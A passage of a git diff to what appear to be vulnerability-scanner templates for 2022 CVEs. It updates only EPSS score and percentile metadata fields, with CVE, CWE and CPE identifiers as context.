cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38794.yaml b/http/cves/2022/CVE-2022-38794.yaml index d39bf7b7f1..73fa476dcf 100644 --- a/http/cves/2022/CVE-2022-38794.yaml +++ b/http/cves/2022/CVE-2022-38794.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-38794 cwe-id: CWE-22 epss-score: 0.0046 - epss-percentile: 0.72614 + epss-percentile: 0.7264 cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-38817.yaml b/http/cves/2022/CVE-2022-38817.yaml index 28cba0b585..dcf78bf0b4 100644 --- a/http/cves/2022/CVE-2022-38817.yaml +++ b/http/cves/2022/CVE-2022-38817.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-38817 cwe-id: CWE-306 epss-score: 0.00898 - epss-percentile: 0.80929 + epss-percentile: 0.80941 cpe: cpe:2.3:a:linuxfoundation:dapr_dashboard:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml index cd853bc0ca..4e971f94df 100644 --- a/http/cves/2022/CVE-2022-38870.yaml +++ b/http/cves/2022/CVE-2022-38870.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-38870 cwe-id: CWE-306 epss-score: 0.00607 - epss-percentile: 0.76232 + epss-percentile: 0.76255 cpe: cpe:2.3:a:free5gc:free5gc:3.2.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-39048.yaml b/http/cves/2022/CVE-2022-39048.yaml index 780082d211..3a4db31e09 100644 --- a/http/cves/2022/CVE-2022-39048.yaml +++ b/http/cves/2022/CVE-2022-39048.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-39048 cwe-id: CWE-79 epss-score: 0.00432 - epss-percentile: 0.71716 + epss-percentile: 0.71739 cpe: cpe:2.3:a:servicenow:servicenow:quebec:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3908.yaml b/http/cves/2022/CVE-2022-3908.yaml index 2fb53e1b14..93b148ef29 100644 --- a/http/cves/2022/CVE-2022-3908.yaml +++ b/http/cves/2022/CVE-2022-3908.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-3908 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.2948 + epss-percentile: 0.29485 cpe: cpe:2.3:a:helloprint:helloprint:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml index 28eae0ce5c..a9f8881ba4 100644 --- a/http/cves/2022/CVE-2022-39195.yaml +++ b/http/cves/2022/CVE-2022-39195.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-39195 cwe-id: CWE-79 epss-score: 0.00132 - epss-percentile: 0.48073 + epss-percentile: 0.48085 cpe: cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3933.yaml b/http/cves/2022/CVE-2022-3933.yaml index 676a5ac2b0..618a6d8151 100644 --- a/http/cves/2022/CVE-2022-3933.yaml +++ b/http/cves/2022/CVE-2022-3933.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-3933 cwe-id: CWE-79 epss-score: 0.00077 - epss-percentile: 0.323 + epss-percentile: 0.32308 cpe: cpe:2.3:a:g5theme:essential_real_estate:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3934.yaml b/http/cves/2022/CVE-2022-3934.yaml index 99de53a2cf..ce323633bd 100644 --- a/http/cves/2022/CVE-2022-3934.yaml +++ b/http/cves/2022/CVE-2022-3934.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-3934 cwe-id: CWE-79 epss-score: 0.00077 - epss-percentile: 0.323 + epss-percentile: 0.32308 cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index 2777f6bc07..b4e5c6993b 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-3980 cwe-id: CWE-611 epss-score: 0.6584 - epss-percentile: 0.97548 + epss-percentile: 0.9755 cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml index 8cc3f4c737..9325becc97 100644 --- a/http/cves/2022/CVE-2022-3982.yaml +++ b/http/cves/2022/CVE-2022-3982.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-3982 cwe-id: CWE-434 epss-score: 0.11707 - epss-percentile: 0.94679 + epss-percentile: 0.94682 cpe: cpe:2.3:a:wpdevart:booking_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index 4c92412bc2..e2a7f452fb 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-39952 cwe-id: CWE-668 epss-score: 0.9032 - epss-percentile: 0.98463 + epss-percentile: 0.98464 cpe: cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml index 780f498c4d..835ff689cb 100644 --- a/http/cves/2022/CVE-2022-39960.yaml +++ b/http/cves/2022/CVE-2022-39960.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-39960 cwe-id: CWE-862 epss-score: 0.24578 - epss-percentile: 0.96099 + epss-percentile: 0.96101 cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:jira:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml index e19c736a56..ea2e984a4d 100644 --- a/http/cves/2022/CVE-2022-39986.yaml +++ b/http/cves/2022/CVE-2022-39986.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-39986 cwe-id: CWE-77 epss-score: 0.67236 - epss-percentile: 0.97586 + epss-percentile: 0.9759 cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml index 294cb207fc..31670f099a 100644 --- a/http/cves/2022/CVE-2022-40022.yaml +++ b/http/cves/2022/CVE-2022-40022.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-40022 cwe-id: CWE-77 epss-score: 0.85269 - epss-percentile: 0.98169 + epss-percentile: 0.98171 cpe: cpe:2.3:o:microchip:syncserver_s650_firmware:-:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-40032.yaml b/http/cves/2022/CVE-2022-40032.yaml index 7a037558de..d648ec1e6f 100644 --- a/http/cves/2022/CVE-2022-40032.yaml +++ b/http/cves/2022/CVE-2022-40032.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-40032 cwe-id: CWE-89 epss-score: 0.00179 - epss-percentile: 0.54999 + epss-percentile: 0.55025 cpe: cpe:2.3:a:simple_task_managing_system_project:simple_task_managing_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40047.yaml b/http/cves/2022/CVE-2022-40047.yaml index 1b43ee1983..77568297be 100644 --- a/http/cves/2022/CVE-2022-40047.yaml +++ b/http/cves/2022/CVE-2022-40047.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-40047 cwe-id: CWE-79 epss-score: 0.00535 - epss-percentile: 0.74583 + epss-percentile: 0.74609 cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40083.yaml b/http/cves/2022/CVE-2022-40083.yaml index c85299de56..4dc5cada48 100644 --- a/http/cves/2022/CVE-2022-40083.yaml +++ b/http/cves/2022/CVE-2022-40083.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-40083 cwe-id: CWE-601 epss-score: 0.01687 - epss-percentile: 0.86311 + epss-percentile: 0.86315 cpe: cpe:2.3:a:labstack:echo:4.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml index 62070c9aa0..7e8bc1149a 100644 --- a/http/cves/2022/CVE-2022-40127.yaml +++ b/http/cves/2022/CVE-2022-40127.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-40127 cwe-id: CWE-94 epss-score: 0.12805 - epss-percentile: 0.94872 + epss-percentile: 0.94875 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40359.yaml b/http/cves/2022/CVE-2022-40359.yaml index 8e2101fe19..1c121cb1e3 100644 --- a/http/cves/2022/CVE-2022-40359.yaml +++ b/http/cves/2022/CVE-2022-40359.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-40359 cwe-id: CWE-79 epss-score: 0.00109 - epss-percentile: 0.43633 + epss-percentile: 0.43656 cpe: cpe:2.3:a:kfm_project:kfm:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml index 3e97e694a2..7f1ecd7e6b 100644 --- a/http/cves/2022/CVE-2022-4049.yaml +++ b/http/cves/2022/CVE-2022-4049.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-4049 cwe-id: CWE-89 epss-score: 0.02366 - epss-percentile: 0.88638 + epss-percentile: 0.88644 cpe: cpe:2.3:a:wp_user_project:wp_user:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index 2123b02269..efbdf7b4b0 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-4050 cwe-id: CWE-89 epss-score: 0.02366 - epss-percentile: 0.88638 + epss-percentile: 0.88644 cpe: cpe:2.3:a:beardev:joomsport:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml index 5094853a22..93382c6288 100644 --- a/http/cves/2022/CVE-2022-4057.yaml +++ b/http/cves/2022/CVE-2022-4057.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-4057 cwe-id: CWE-425 epss-score: 0.00177 - epss-percentile: 0.54746 + epss-percentile: 0.54771 cpe: cpe:2.3:a:optimizingmatters:autooptimize:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4059.yaml b/http/cves/2022/CVE-2022-4059.yaml index 5dcb451884..ad6f97747e 100644 --- a/http/cves/2022/CVE-2022-4059.yaml +++ b/http/cves/2022/CVE-2022-4059.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-4059 cwe-id: CWE-89 epss-score: 0.02366 - epss-percentile: 0.88638 + epss-percentile: 0.88644 cpe: cpe:2.3:a:blocksera:cryptocurrency_widgets_pack:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4060.yaml b/http/cves/2022/CVE-2022-4060.yaml index 52d607e27f..912c752c79 100644 --- a/http/cves/2022/CVE-2022-4060.yaml +++ b/http/cves/2022/CVE-2022-4060.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-4060 cwe-id: CWE-94 epss-score: 0.37849 - epss-percentile: 0.96777 + epss-percentile: 0.96779 cpe: cpe:2.3:a:odude:user_post_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml index f306987acf..697a2450f1 100644 --- a/http/cves/2022/CVE-2022-4063.yaml +++ b/http/cves/2022/CVE-2022-4063.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-4063 cwe-id: CWE-22 epss-score: 0.02084 - epss-percentile: 0.87868 + epss-percentile: 0.87875 cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml index 572f293c3d..beff1ef380 100644 --- a/http/cves/2022/CVE-2022-40734.yaml +++ b/http/cves/2022/CVE-2022-40734.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-40734 cwe-id: CWE-22 epss-score: 0.00804 - epss-percentile: 0.79805 + epss-percentile: 0.79815 cpe: cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index 6249350458..e101f2a943 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-40843 cwe-id: CWE-287 epss-score: 0.52103 - epss-percentile: 0.97196 + epss-percentile: 0.97198 cpe: cpe:2.3:o:tenda:w15e_firmware:15.11.0.10\(1576\):*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml index f2d8699d38..b0f5070c6a 100644 --- a/http/cves/2022/CVE-2022-40879.yaml +++ b/http/cves/2022/CVE-2022-40879.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-40879 cwe-id: CWE-79 epss-score: 0.01566 - epss-percentile: 0.85818 + epss-percentile: 0.85823 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml index f7682fa58f..a9e722bfcd 100644 --- a/http/cves/2022/CVE-2022-40881.yaml +++ b/http/cves/2022/CVE-2022-40881.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-40881 cwe-id: CWE-77 epss-score: 0.95494 - epss-percentile: 0.99171 + epss-percentile: 0.99172 cpe: cpe:2.3:o:contec:solarview_compact_firmware:6.00:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml index db79a3e192..e28ae16f2a 100644 --- a/http/cves/2022/CVE-2022-4117.yaml +++ b/http/cves/2022/CVE-2022-4117.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-4117 cwe-id: CWE-89 epss-score: 0.02479 - epss-percentile: 0.88892 + epss-percentile: 0.88898 cpe: cpe:2.3:a:iws-geo-form-fields_project:iws-geo-form-fields:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4140.yaml b/http/cves/2022/CVE-2022-4140.yaml index 1491748707..07a01957c9 100644 --- a/http/cves/2022/CVE-2022-4140.yaml +++ b/http/cves/2022/CVE-2022-4140.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-4140 cwe-id: CWE-552 epss-score: 0.00513 - epss-percentile: 0.7402 + epss-percentile: 0.74046 cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index 930a7d2dcd..c91d32fa40 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-41441 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.38747 + epss-percentile: 0.38761 cpe: cpe:2.3:a:reqlogic:reqlogic:11.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index 0c7082be75..2be8c27df2 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-41473 cwe-id: CWE-79 - epss-score: 0.01162 - epss-percentile: 0.83344 + epss-score: 0.01722 + epss-percentile: 0.86447 cpe: cpe:2.3:a:rpcms:rpcms:3.0.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-41840.yaml b/http/cves/2022/CVE-2022-41840.yaml index 80ecb1f20f..bb9f0221e5 100644 --- a/http/cves/2022/CVE-2022-41840.yaml +++ b/http/cves/2022/CVE-2022-41840.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-41840 cwe-id: CWE-22 epss-score: 0.00552 - epss-percentile: 0.74995 + epss-percentile: 0.75018 cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml index d1b8f92f2c..63f2c93ef2 100644 --- a/http/cves/2022/CVE-2022-42094.yaml +++ b/http/cves/2022/CVE-2022-42094.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-42094 cwe-id: CWE-79 epss-score: 0.00604 - epss-percentile: 0.76185 + epss-percentile: 0.76208 cpe: cpe:2.3:a:backdropcms:backdrop:1.23.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42095.yaml b/http/cves/2022/CVE-2022-42095.yaml index 7921457537..c3f0aa4189 100644 --- a/http/cves/2022/CVE-2022-42095.yaml +++ b/http/cves/2022/CVE-2022-42095.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-42095 cwe-id: CWE-79 epss-score: 0.00487 - epss-percentile: 0.73367 + epss-percentile: 0.73394 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42096.yaml b/http/cves/2022/CVE-2022-42096.yaml index 17bfc2f0f0..ebb8e8a933 100644 --- a/http/cves/2022/CVE-2022-42096.yaml +++ b/http/cves/2022/CVE-2022-42096.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-42096 cwe-id: CWE-79 epss-score: 0.00609 - epss-percentile: 0.76269 + epss-percentile: 0.76291 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42233.yaml b/http/cves/2022/CVE-2022-42233.yaml index 0537a4725c..72baaaf6c7 100644 --- a/http/cves/2022/CVE-2022-42233.yaml +++ b/http/cves/2022/CVE-2022-42233.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-42233 cwe-id: CWE-287 epss-score: 0.85271 - epss-percentile: 0.9817 + epss-percentile: 0.98172 cpe: cpe:2.3:o:tenda:11n_firmware:5.07.33_cn:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4260.yaml b/http/cves/2022/CVE-2022-4260.yaml index a0831ea633..3dfdad35d9 100644 --- a/http/cves/2022/CVE-2022-4260.yaml +++ b/http/cves/2022/CVE-2022-4260.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-4260 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32619 + epss-percentile: 0.32626 cpe: cpe:2.3:a:wp-ban_project:wp-ban:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml index b3fd7d508d..b2276226f7 100644 --- a/http/cves/2022/CVE-2022-42746.yaml +++ b/http/cves/2022/CVE-2022-42746.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-42746 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32621 + epss-percentile: 0.32628 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml index cf0a553cd2..dce3fd7efe 100644 --- a/http/cves/2022/CVE-2022-42747.yaml +++ b/http/cves/2022/CVE-2022-42747.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-42747 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32621 + epss-percentile: 0.32628 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml index 206ea8e224..3cbe536c68 100644 --- a/http/cves/2022/CVE-2022-42748.yaml +++ b/http/cves/2022/CVE-2022-42748.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-42748 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32621 + epss-percentile: 0.32628 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml index 2d00fa3ad7..bfaaa0aefc 100644 --- a/http/cves/2022/CVE-2022-42749.yaml +++ b/http/cves/2022/CVE-2022-42749.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-42749 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32621 + epss-percentile: 0.32628 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml index b5f42eca19..b22a3cec8d 100644 --- a/http/cves/2022/CVE-2022-4295.yaml +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-4295 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29488 + epss-percentile: 0.29493 cpe: cpe:2.3:a:appjetty:show_all_comments:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4301.yaml b/http/cves/2022/CVE-2022-4301.yaml index 3f83135bd2..60fd877b25 100644 --- a/http/cves/2022/CVE-2022-4301.yaml +++ b/http/cves/2022/CVE-2022-4301.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-4301 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29488 + epss-percentile: 0.29493 cpe: cpe:2.3:a:sunshinephotocart:sunshine_photo_cart:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index ee035d7562..1256c4003d 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-43014 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.40317 + epss-percentile: 0.40339 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml index b9a58aa483..863239ce50 100644 --- a/http/cves/2022/CVE-2022-43015.yaml +++ b/http/cves/2022/CVE-2022-43015.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-43015 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.40317 + epss-percentile: 0.40339 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml index 61a4338623..0104e41106 100644 --- a/http/cves/2022/CVE-2022-43016.yaml +++ b/http/cves/2022/CVE-2022-43016.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-43016 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.40317 + epss-percentile: 0.40339 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml index 60ace5128d..30f4811405 100644 --- a/http/cves/2022/CVE-2022-43017.yaml +++ b/http/cves/2022/CVE-2022-43017.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-43017 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.40317 + epss-percentile: 0.40339 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43018.yaml b/http/cves/2022/CVE-2022-43018.yaml index d522c9a958..ef9e8a9556 100644 --- a/http/cves/2022/CVE-2022-43018.yaml +++ b/http/cves/2022/CVE-2022-43018.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-43018 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.40317 + epss-percentile: 0.40339 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4305.yaml b/http/cves/2022/CVE-2022-4305.yaml index 1f5b446ddb..3c6e49dc80 100644 --- a/http/cves/2022/CVE-2022-4305.yaml +++ b/http/cves/2022/CVE-2022-4305.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-4305 cwe-id: CWE-269 epss-score: 0.24887 - epss-percentile: 0.96115 + epss-percentile: 0.96118 cpe: cpe:2.3:a:wp-buy:login_as_user_or_customer_\(user_switching\):*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4306.yaml b/http/cves/2022/CVE-2022-4306.yaml index 391888f87c..0f5609cfab 100644 --- a/http/cves/2022/CVE-2022-4306.yaml +++ b/http/cves/2022/CVE-2022-4306.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-4306 cwe-id: CWE-79 epss-score: 0.00077 - epss-percentile: 0.323 + epss-percentile: 0.32308 cpe: cpe:2.3:a:panda_pods_repeater_field_project:panda_pods_repeater_field:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43140.yaml b/http/cves/2022/CVE-2022-43140.yaml index 35d8763142..0c8f815209 100644 --- a/http/cves/2022/CVE-2022-43140.yaml +++ b/http/cves/2022/CVE-2022-43140.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-43140 cwe-id: CWE-918 epss-score: 0.33415 - epss-percentile: 0.96555 + epss-percentile: 0.96556 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml index 39940fbf7d..f2b42fdd25 100644 --- a/http/cves/2022/CVE-2022-43164.yaml +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-43164 cwe-id: CWE-79 epss-score: 0.00223 - epss-percentile: 0.60427 + epss-percentile: 0.60458 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index 85afc0b9b7..2bef544771 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-43165 cwe-id: CWE-79 epss-score: 0.00223 - epss-percentile: 0.60427 + epss-percentile: 0.60458 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index 0bc4e3b23d..39dc3edc8a 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-43166 cwe-id: CWE-79 epss-score: 0.00223 - epss-percentile: 0.60427 + epss-percentile: 0.60458 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml index a2da409c55..3b31f4bbca 100644 --- a/http/cves/2022/CVE-2022-43167.yaml +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-43167 cwe-id: CWE-79 epss-score: 0.00223 - epss-percentile: 0.60427 + epss-percentile: 0.60458 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index 7601272f04..f03731b441 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-43169 cwe-id: CWE-79 epss-score: 0.00223 - epss-percentile: 0.60427 + epss-percentile: 0.60458 cpe: 